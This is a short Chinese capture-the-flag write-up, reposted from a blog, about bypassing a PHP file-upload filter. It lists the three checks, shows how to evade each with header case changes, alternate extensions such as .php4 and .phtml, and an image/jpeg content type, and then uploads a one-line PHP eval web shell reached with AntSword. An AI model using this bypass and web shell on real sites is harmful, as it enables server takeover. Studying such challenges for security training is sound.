题目没有太多的描述 简单明了
(它不想要PHP文件) 上传一个其他类型试试看
被拦截了
回想之前我们做过的题目 不可以上传 php文件 说明一共存在三个过滤
- 请求头部的 Content-Type
- 文件后缀
- 请求数据的Content-Type
开始抓包咯
原始数据包 下面我们开始改包
上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空
请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
所上传的文件后缀 改为 .php4(依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写))
请求数据的Content-Type 内容改为 image/jpeg
顺便在包中加入一句话代码 (<script language=php>eval($_POST['cmd']);</script>)
上传成功
使用蚁剑进行连接
找到flag
本文转载自: https://blog.csdn.net/m0_57954651/article/details/127652270
版权归原作者 :Carmelo Anthony 所有, 如有侵权,请联系我们删除。
版权归原作者 :Carmelo Anthony 所有, 如有侵权,请联系我们删除。